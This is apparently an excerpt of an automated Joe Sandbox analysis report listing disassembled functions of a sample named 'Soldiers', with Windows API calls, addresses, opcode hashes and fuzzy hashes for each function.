                                                          • Opcode Fuzzy Hash: 7538c597775b3e9fd58cac397f86b07abb9ed5a875db3a3be71460be50ee91a3
                                                          • Instruction Fuzzy Hash: FE317E72639205EFEB109F54DC48FAA77BEEF95319F104215FA04D6190EBB49DC09BA0
                                                          Function 0091C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008,00000000), ref: 008E260D
                                                          • SetTextColor.GDI32(?,000000FF,00000000), ref: 008E2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 008E262C
                                                          • GetStockObject.GDI32(00000005), ref: 008E2634
                                                          • GetClientRect.USER32(?), ref: 0091C0FC
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0091C113
                                                          • GetWindowDC.USER32(?), ref: 0091C11F
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0091C12E
                                                          • ReleaseDC.USER32(?,00000000), ref: 0091C140
                                                          • GetSysColor.USER32(00000005), ref: 0091C15E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: e2dd28cd30644d22e339b0fea7e6941a01ac6b83f0b03fe095d39e1dce855aa4
                                                          • Instruction ID: 5f22c59e6b8e7d09445a1ea09a9e3b78f67ae85c44eea9954efff6316191cbb4
                                                          • Opcode Fuzzy Hash: e2dd28cd30644d22e339b0fea7e6941a01ac6b83f0b03fe095d39e1dce855aa4
                                                          • Instruction Fuzzy Hash: 76117C32658248FFDB615FA4EC08BE97BA6FB89321F504221FA69950E1CB710991FF10
                                                          Function 008EAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008EADE1
                                                          • OleUninitialize.OLE32(?,00000000), ref: 008EAE80
                                                          • UnregisterHotKey.USER32(?), ref: 008EAFD7
                                                          • DestroyWindow.USER32(?), ref: 00922F64
                                                          • FreeLibrary.KERNEL32(?), ref: 00922FC9
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00922FF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 711a77211f6eb9263b8d71074c337d2373f57bc779b72157521af1f1b35fe034
                                                          • Instruction ID: b3f1d7688a71ef9314fb1a34365f807c9454fe0482c8c760ba33dc61bf4dfa16
                                                          • Opcode Fuzzy Hash: 711a77211f6eb9263b8d71074c337d2373f57bc779b72157521af1f1b35fe034
                                                          • Instruction Fuzzy Hash: CBA18D71701222DFCB29EF15D995B69F764FF45B00F1082ACE90AAB256CB30AD12CF91
                                                          Function 0093AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumChildWindows.USER32(?,0093B13A), ref: 0093B078
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 34ed6b6dd3529ee6a1582890aa98779cf5c5ee8e66a5c8ec18e8b299acd6f40f
                                                          • Instruction ID: 29c52b133a6563917b01036f3fd62489bb3f9b441747ee22d54298a3e786e098
                                                          • Opcode Fuzzy Hash: 34ed6b6dd3529ee6a1582890aa98779cf5c5ee8e66a5c8ec18e8b299acd6f40f
                                                          • Instruction Fuzzy Hash: 78917170600609EECB18EF64C485BEEFBB9FF44300F548519E99AA7291DF306959CFA1
                                                          Function 008E31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 008E327E
                                                            • Part of subcall function 008E218F: GetClientRect.USER32(?,?), ref: 008E21B8
                                                            • Part of subcall function 008E218F: GetWindowRect.USER32(?,?), ref: 008E21F9
                                                            • Part of subcall function 008E218F: ScreenToClient.USER32(?,?), ref: 008E2221
                                                          • GetDC.USER32 ref: 0091D073
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0091D086
                                                          • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 0091D094
                                                          • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 0091D0A9
                                                          • ReleaseDC.USER32(?,00000000,?,00000031,00000000,00000000), ref: 0091D0B1
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0091D13C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 4e79b45e1b8a4d0bb1483de99cde4e0e1135d5302a100776e4011a475d098ddf
                                                          • Instruction ID: 84a0fb95136fa768196cca0399277cd8c62f6f15e53a67d66861eeeba0a0f181
                                                          • Opcode Fuzzy Hash: 4e79b45e1b8a4d0bb1483de99cde4e0e1135d5302a100776e4011a475d098ddf
                                                          • Instruction Fuzzy Hash: 95711430605249EFCF258F64CC84AEA7BB9FF4A321F144269ED559B165C7318D81DF60
                                                          Function 0096C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                            • Part of subcall function 008E2714: GetCursorPos.USER32(?,?,009A77B0,?,009A77B0,009A77B0,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?), ref: 008E2727
                                                            • Part of subcall function 008E2714: ScreenToClient.USER32(009A77B0,?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001), ref: 008E2744
                                                            • Part of subcall function 008E2714: GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2769
                                                            • Part of subcall function 008E2714: GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2777
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0096C69C
                                                          • ImageList_EndDrag.COMCTL32 ref: 0096C6A2
                                                          • ReleaseCapture.USER32 ref: 0096C6A8
                                                          • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 0096C752
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0096C765
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0096C847
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 7aff864fc4d0e7c2bb1a78def2104f005f59a6cc4bb93ac31c79fbe521901067
                                                          • Instruction ID: fdae517b0382c1a89fde0eda1d83b420fbe9b9e7d16ecc27927959e6fa911554
                                                          • Opcode Fuzzy Hash: 7aff864fc4d0e7c2bb1a78def2104f005f59a6cc4bb93ac31c79fbe521901067
                                                          • Instruction Fuzzy Hash: FA518A71608305AFDB10EF28CC9AF6A7BE5FF85314F008519F595872E1CB70A945DB92
                                                          Function 009520E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0095211C
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00952148
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0095218A
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 0095219F
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 009521AC
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 009521DC
                                                          • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 00952223
                                                            • Part of subcall function 00952B4F: GetLastError.KERNEL32(?,?,00951EE3,00000000,00000000,00000001), ref: 00952B64
                                                            • Part of subcall function 00952B4F: SetEvent.KERNEL32(?,?,00951EE3,00000000,00000000,00000001), ref: 00952B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: cff7a51fbf51aff90aca24a07089e96d684b81e73f24c07b3427745397d5220f
                                                          • Instruction ID: 7d9daf00f5fe907f17acb010aff9d949ff7143c6b65e37ac2e7de6e6a84ea8d6
                                                          • Opcode Fuzzy Hash: cff7a51fbf51aff90aca24a07089e96d684b81e73f24c07b3427745397d5220f
                                                          • Instruction Fuzzy Hash: 37418DB5514208BFEB16DF61CC89FBF7BACEB49351F004016FE189A181D7749D489BA0
                                                          Function 00959330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00970980), ref: 00959412
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00970980), ref: 00959446
                                                          • #164.OLEAUT32(?,?,?,?,?,?,00970980), ref: 009595C0
                                                          • #6.OLEAUT32(?,?,?,00970980), ref: 009595EA
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #164FileFreeLibraryModuleName
                                                          • String ID:
                                                          • API String ID: 2716333841-0
                                                          • Opcode ID: 6f1438c2f555bfaaa699695207caef4e704d347d3597243e66c19ee847bbb94b
                                                          • Instruction ID: 84c27857086f3e99eaf121d69bd5a4102e519ad7de0f77ea672e9e5bb1a0f86f
                                                          • Opcode Fuzzy Hash: 6f1438c2f555bfaaa699695207caef4e704d347d3597243e66c19ee847bbb94b
                                                          • Instruction Fuzzy Hash: 43F14F71A00209EFDF14DF95C884EAEB7B9FF89315F108459F906AB251DB31AE4ACB50
                                                          Function 0095FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0095FD9E
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095FF31
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095FF55
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095FF95
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095FFB7
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00960133
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00960165
                                                          • CloseHandle.KERNEL32(?), ref: 00960194
                                                          • CloseHandle.KERNEL32(?), ref: 0096020B
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 5af410225ddfa4ea5a2ac88079d49ade78806a6b25c7435e607b91f3fe230ea0
                                                          • Instruction ID: b92179750f02a7dd2725ff704f6e861df59559009c646f024c1ce8dff2726ee4
                                                          • Opcode Fuzzy Hash: 5af410225ddfa4ea5a2ac88079d49ade78806a6b25c7435e607b91f3fe230ea0
                                                          • Instruction Fuzzy Hash: E2E19A312082419FC724EF25C891B6BBBE5FF85314F14886DF9899B2A2DB31EC45CB52
                                                          Function 0094527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00944BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943B8A,?), ref: 00944BE0
                                                            • Part of subcall function 00944BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943B8A,?), ref: 00944BF9
                                                            • Part of subcall function 00944FEC: GetFileAttributesW.KERNEL32(?,00943BFE), ref: 00944FED
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 009452FB
                                                          • _wcscmp.LIBCMT ref: 00945315
                                                          • MoveFileW.KERNEL32(?,?), ref: 00945330
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: d2dea350c78b57885d05bb3f0bfab333ddbb09904ca018c392ffeb887c403fb2
                                                          • Instruction ID: 9370b717b10d9319b8fcaa3087f41f5f876fb8846912ec5ea69d2a7bfe484866
                                                          • Opcode Fuzzy Hash: d2dea350c78b57885d05bb3f0bfab333ddbb09904ca018c392ffeb887c403fb2
                                                          • Instruction Fuzzy Hash: FA5184B20083859BC725DBA4D885EDFB7ECEF84340F50492EF289C3152EF74A6888756
                                                          Function 00968C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00968D24
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 0bb6ad0b7aa2e2222409e171e3d68e684ac0ccba00b10cb90f4b3e8ebe2c52ef
                                                          • Instruction ID: 73450187bb15709beb998ffc157f02363b77f026cc7d733fb4199ef5211f39de
                                                          • Opcode Fuzzy Hash: 0bb6ad0b7aa2e2222409e171e3d68e684ac0ccba00b10cb90f4b3e8ebe2c52ef
                                                          • Instruction Fuzzy Hash: D251BE70644204BEEF21AB288C89BAB7B68FB45350F244711FA54E71E1CF76A990DB61
                                                          Function 008E2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0091C638
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091C65A
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0091C672
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0091C690
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0091C6B1
                                                          • DestroyIcon.USER32(00000000), ref: 0091C6C0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0091C6DD
                                                          • DestroyIcon.USER32(?), ref: 0091C6EC
                                                            • Part of subcall function 0096AAD4: DeleteObject.GDI32(00000000,?,?,?,008E2FDC,00000000), ref: 0096AB0D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 0982c3b54764469e7dc5904e66747884faa0d1357a041b58d6cc04fbac97e154
                                                          • Instruction ID: 524c01a22299bf51768c2360636d391290ac0f0e1baee33455559e8e30f1e8ee
                                                          • Opcode Fuzzy Hash: 0982c3b54764469e7dc5904e66747884faa0d1357a041b58d6cc04fbac97e154
                                                          • Instruction Fuzzy Hash: 68517970614249EFDB24DF29CC46BAA7BB9FB85750F104618F906D72A0DB70EC90EB50
                                                          Function 0093A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0093B52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,0093A23B,?,00000001), ref: 0093B54D
                                                            • Part of subcall function 0093B52D: GetCurrentThreadId.KERNEL32 ref: 0093B554
                                                            • Part of subcall function 0093B52D: AttachThreadInput.USER32(00000000,?,0093A23B,?,00000001), ref: 0093B55B
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 0093A246
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 0093A263
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0093A266
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000025,00000000,?,00000001), ref: 0093A26F
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000,?,00000001), ref: 0093A28D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093A290
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093A299
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093A2B0
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093A2B3
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: cae501b3c6c0ac06d4d8f8b86d3afb3b521a59e7c93af94d70143ed4cc6a0769
                                                          • Instruction ID: 12f4f191218fcf7917c36688eefef99bff98ccab03d256d5ce1c777948acef33
                                                          • Opcode Fuzzy Hash: cae501b3c6c0ac06d4d8f8b86d3afb3b521a59e7c93af94d70143ed4cc6a0769
                                                          • Instruction Fuzzy Hash: 5F11C272564218BEF6106B609C4AF6A3A1DDBCC760F501419F3546B0D0CAF35C90EAA4
                                                          Function 009394D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0093915A,00000B00,?,?), ref: 009394E2
                                                          • HeapAlloc.KERNEL32(00000000,?,0093915A,00000B00,?,?), ref: 009394E9
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0093915A,00000B00,?,?), ref: 009394FE
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0093915A,00000B00,?,?), ref: 00939506
